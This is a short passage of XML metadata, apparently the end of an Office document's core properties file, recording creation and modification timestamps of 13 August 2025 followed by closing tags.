  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-13T05:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-13T05:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>